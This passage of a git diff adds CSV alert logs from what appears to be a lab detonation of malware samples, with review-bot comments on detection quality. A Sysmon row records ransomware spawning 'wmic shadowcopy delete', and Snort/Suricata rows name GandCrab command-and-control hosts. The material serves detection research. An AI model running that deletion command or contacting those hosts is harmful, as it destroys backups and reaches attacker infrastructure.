'728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 6, 2020 @ 14:21:28.750",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '6a5ba5db7a5af421f75d94743743fe75' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '31ff396526e9de372a9c73b66b754121a6110de5' +" +"Apr 6, 2020 @ 14:21:07.309",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:20:59.148",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:20:12.286",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:19:37.770",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:19:03.962",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 14:19:03.947",8,"Windows Audit Policy changed", diff --git a/data/MW_22_HIDS_3.csv b/data/MW_22_HIDS_3.csv new file mode 100644 index 0000000..d1c1284 
--- /dev/null +++ b/data/MW_22_HIDS_3.csv 
@@ -0,0 +1,139 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 24, 2020 @ 13:50:23.958",9,"Windows Application error event","""Faulting application name: winlogon.exe, version: 10.0.18362.693, time stamp: 0xeda872dc +Faulting module name: msvcrt.dll, version: 7.0.18362.1, time stamp: 0xf5bdefd7 +Exception code: 0x40000015 +Fault offset: 0x000000000000ae72 +Faulting process id: 0x16d8 +Faulting application start time: 0x01d631d221e1f41b +Faulting application path: C:\Windows\system32\winlogon.exe +Faulting module path: C:\Windows\System32\msvcrt.dll +Report Id: 75c957a2-0936-4aed-a78b-572b2d700cda +Faulting package full name: +Faulting package-relative application ID: """,, +"May 24, 2020 @ 13:50:01.662",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '01fd3d623cd1212dc2db7fb53f3f8706' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '039037543a932327e95cb73b56beadf230ce75a6' +" +"May 24, 2020 @ 13:50:01.646",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '4a4201336efd4dab88e86fa22c476f9b' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '1cde5b8e975fa3bcd4307ab51c1b43564ca9d656' +" +"May 24, 2020 @ 13:50:00.271",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. 
+Old md5sum was: '49574a9da5b73510ecb8125c7786d037' +New md5sum is : 'a94ecbd5eaeee72bd7ceca1faad96e30' +Old sha1sum was: 'fc3c9a4be6b806a974693af1dc528845db7631da' +New sha1sum is : '269518a35686493cde84837b1668ea322e4d3d13' +" +"May 24, 2020 @ 13:49:59.191",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"May 24, 2020 @ 13:49:44.489",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"May 24, 2020 @ 13:49:16.254",9,"Windows Application error event","""Faulting application name: winlogon.exe, version: 10.0.18362.693, time stamp: 0xeda872dc +Faulting module name: msvcrt.dll, version: 7.0.18362.1, time stamp: 0xf5bdefd7 +Exception code: 0x40000015 +Fault offset: 0x000000000000ae72 +Faulting process id: 0x244 +Faulting application start time: 0x01d631d1f7428bc3 +Faulting application path: C:\Windows\system32\winlogon.exe +Faulting module path: C:\Windows\System32\msvcrt.dll +Report Id: 70880634-b5f9-40da-bf1c-68260a77c44d +Faulting package full name: +Faulting package-relative application ID: """,, +"May 24, 2020 @ 13:48:51.909",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. 
+Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"May 24, 2020 @ 13:48:51.259",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. +Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"May 24, 2020 @ 13:48:31.577",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 24, 2020 @ 13:48:25.151",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060 +EventType: SetValue +UtcTime: 2020-05-24 13:48:11.808 +ProcessGuid: {df9fc3d3-7b18-5eca-0000-0010cb910000} +ProcessId: 328 +Image: C:\Windows\System32\smss.exe +TargetObject: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs +Details: DWORD (0x00000001)""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T13:48:21.301287700Z"",""eventRecordID"":""1391"",""processID"":""2296"",""threadID"":""3676"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 13:48:11.808\r\nProcessGuid: {df9fc3d3-7b18-5eca-0000-0010cb910000}\r\nProcessId: 328\r\nImage: C:\\Windows\\System32\\smss.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs\r\nDetails: DWORD (0x00000001)\""""},""eventdata"":{""ruleName"":""T1060"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 13:48:11.808"",""processGuid"":""{df9fc3d3-7b18-5eca-0000-0010cb910000}"",""processId"":""328"",""image"":""C:\\\\Windows\\\\System32\\\\smss.exe"",""targetObject"":""HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\LoadAppInit_DLLs"",""details"":""DWORD (0x00000001)""}}}" +"May 24, 2020 @ 13:48:22.803",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 24, 2020 @ 13:47:44.586",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 24, 2020 @ 13:47:44.569",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 24, 2020 @ 13:45:14.590",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6324; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryStaticData; ResultCode = 0x80041010; PossibleCause = Unknown""",, +"May 24, 2020 @ 13:44:35.588",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. 
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 24, 2020 @ 13:43:18.250",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 24, 2020 @ 13:43:18.200",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 24, 2020 @ 13:43:09.418",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 24, 2020 @ 13:43:08.402",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '8535e71303cbabe6816cd4f197652bc8' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '46940de4369c12b1d1c24136f4fe3108925e9678' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +" +"May 24, 2020 @ 13:43:08.386",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'be8a4b502546da3087f02371f0f02c17' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: 'bd49702c05c290aaa23685f3c33157cdf7b4ee52' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +" diff --git a/data/MW_22_NIDS.csv b/data/MW_22_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_22_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_23_HIDS_3.csv b/data/MW_23_HIDS_3.csv new file mode 100644 index 0000000..594943a --- /dev/null +++ b/data/MW_23_HIDS_3.csv 
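Review bot: Most `Integrity checksum changed.` rows in this file look like environment baseline rather than sample activity and should not be counted toward the HIDS result: the `Internet Explorer` and `ActiveX Compatibility` keys alternate between the empty-content digest `d41d8cd98f00b204e9800998ecf8427e` and a fixed value within minutes (13:47:44 and 13:49:59), the `Winlogon` and `VolatileUserMgrKey` rows appear on every run, and the Active Setup `{8A69D345-…}` flip recurs with identical old/new hashes in MW_23_HIDS_3.csv and MW_24_HIDS_3.csv. The same applies to the `AutoAdminLogon` benchmark row and the two `winlogon.exe` fault reports. The one row plausibly tied to the sample is the level-10 `ATT&CK T1060: Autorun Keys Modification` event on `LoadAppInit_DLLs`, but its Image is the system process `smss.exe` rather than a user-launched binary, so it may be session-start activity as well and needs confirming before the overview's Result_HIDS_3 is read as a true positive. A short note in the README listing which rule descriptions are considered baseline noise would make the per-sample results reproducible.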
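Review bot: MW_22_NIDS.csv holds only the header row, which cannot distinguish "no signature fired" from "no traffic captured" for this run, while MW_23_NIDS.csv and MW_24_NIDS.csv contain alerts from the same sensors. The overview uses both `0` and `-` in the Result_NIDS column, so the convention for an empty export should be written down (for instance `-` only when the sensors are known not to have been capturing). One README line per sample stating that `/var/log/snort/alert.fast` and `/var/log/suricata/fast.log` were being tailed during the detonation would make the zero a defensible result.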
@@ -0,0 +1,81 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 29, 2020 @ 12:36:09.900",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +", +"May 29, 2020 @ 12:33:43.257",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 29, 2020 @ 12:33:42.148",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'effa08da348bc457b14fdae2511923be' +New md5sum is : '2cf3ce4970fb25f9237c226b8de91a23' +Old sha1sum was: '0e5b3fad93a467a9f52ed5c88f5f2975b03c4f79' +New sha1sum is : '8f5edce88e798c3b3085f743cc79f804540ea6ae' +", +"May 29, 2020 @ 12:33:42.132",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '100f9ce3de480fe478e2a23a5dd9b2b0' +New md5sum is : '758365bbcd458b2a523c7ab4132c04af' +Old sha1sum was: '2d38ff662d86bec02f7b2458b2d25c471e39ee66' +New sha1sum is : '691b9f4c6de22a25538af85b815563825e93ed4f' +", +"May 29, 2020 @ 12:33:37.788",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 29, 2020 @ 12:33:35.539",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 29, 2020 @ 12:33:25.944",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +", +"May 29, 2020 @ 12:32:12.827",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 29, 2020 @ 12:32:03.697",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 29, 2020 @ 12:31:21.935",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 29, 2020 @ 12:31:21.918",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. 
+Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 29, 2020 @ 12:29:42.808",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 3352; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 29, 2020 @ 12:29:22.611",15,"ATT&CK T1204: Maze Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:15.487 +ProcessGuid: {df9fc3d3-b387-5ecf-0000-0010452c2100} +ProcessId: 3848 +Image: C:\Windows\SysWOW64\wbem\WMIC.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: WMI Commandline Utility +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: wmic.exe +CommandLine: ""C:\Windows\system32\wbem\wmic.exe"" shadowcopy delete +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84 +ParentProcessGuid: {df9fc3d3-b34b-5ecf-0000-00105d221600} +ParentProcessId: 4872 +ParentImage: C:\Users\John Williams\AppData\Local\Temp\gft.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Local\Temp\gft.exe"" ""","\""C:\\Windows\\system32\\wbem\\wmic.exe\"" shadowcopy 
delete",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:15.498253700Z"",""eventRecordID"":""2079"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:15.487\r\nProcessGuid: {df9fc3d3-b387-5ecf-0000-0010452c2100}\r\nProcessId: 3848\r\nImage: C:\\Windows\\SysWOW64\\wbem\\WMIC.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: \""C:\\Windows\\system32\\wbem\\wmic.exe\"" shadowcopy delete\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84\r\nParentProcessGuid: {df9fc3d3-b34b-5ecf-0000-00105d221600}\r\nParentProcessId: 4872\r\nParentImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\gft.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\gft.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:15.487"",""processGuid"":""{df9fc3d3-b387-5ecf-0000-0010452c2100}"",""processId"":""3848"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WMIC.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""WMI Commandline Utility"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""wmic.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe\\\"" shadowcopy delete"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84"",""parentProcessGuid"":""{df9fc3d3-b34b-5ecf-0000-00105d221600}"",""parentProcessId"":""4872"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\gft.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\gft.exe\\\""""}}}", diff --git a/data/MW_23_NIDS.csv b/data/MW_23_NIDS.csv new file mode 100644 index 0000000..d5d1ab1 --- /dev/null +++ b/data/MW_23_NIDS.csv 
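Review bot: The level-15 `ATT&CK T1204: Maze Ransomware` row is indexed at `May 29, 2020 @ 12:29:22.611`, but the Sysmon event inside it carries `UtcTime: 2020-05-28 12:50:15.487` and `systemTime` `2020-05-28T12:50:15…`, about a day earlier, while every other row in the file and the matching NIDS alerts in MW_23_NIDS.csv (12:28–12:31 on May 29) agree with the index time. That looks like the agent VM's clock lagging after a snapshot restore, so anyone correlating `data.win.eventdata.utcTime` with the NIDS `@timestamp` column will miss this event; the `timestamp` column should be documented as the Wazuh/Kibana index time and the endpoint-side `UtcTime` flagged as unreliable for this run. It is also worth recording in the overview that the HIDS rule labels the family as Maze while the NIDS signatures for the same run name GandCrab v4/5 — both are signature labels (one on the `wmic shadowcopy delete` child of `gft.exe`, the other on the CnC POSTs), not a confirmed family attribution.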
@@ -0,0 +1,22 @@ +"@timestamp",message,"log.file.path" +"May 29, 2020 @ 12:31:12.277","05/29-12:31:09.496897 [**] [1:2010066:13] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 171.244.34.167:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:31:12.277","05/29/2020-12:31:09.987333 [**] [1:2010066:16] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 171.244.34.167:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:31:12.277","05/29/2020-12:31:11.317035 [**] [1:2010066:16] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50192 -> 217.174.149.130:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:31:12.277","05/29/2020-12:31:11.317035 [**] [1:2025638:3] ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50192 -> 217.174.149.130:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:31:12.277","05/29-12:31:11.042803 [**] [1:2010066:13] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50192 -> 217.174.149.130:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:37.245","05/29/2020-12:30:35.794580 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50159 -> 186.202.157.79:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:37.245","05/29-12:30:30.852033 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50155 -> 45.118.145.96:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:37.245","05/29-12:30:35.600448 [**] [1:2010067:9] ET POLICY 
Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50159 -> 186.202.157.79:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:37.244","05/29/2020-12:30:31.659499 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50155 -> 45.118.145.96:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:22.234","05/29-12:30:20.465657 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50148 -> 172.67.184.106:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:22.232","05/29/2020-12:30:20.567626 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50148 -> 172.67.184.106:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.231","05/29-12:30:12.839844 [**] [1:2025638:4] ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50108 -> 77.104.144.25:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:15.231","05/29-12:30:12.839844 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50108 -> 77.104.144.25:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:10.000422 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50044 -> 204.11.56.48:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:10.000422 [**] [1:2025638:3] ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50044 -> 
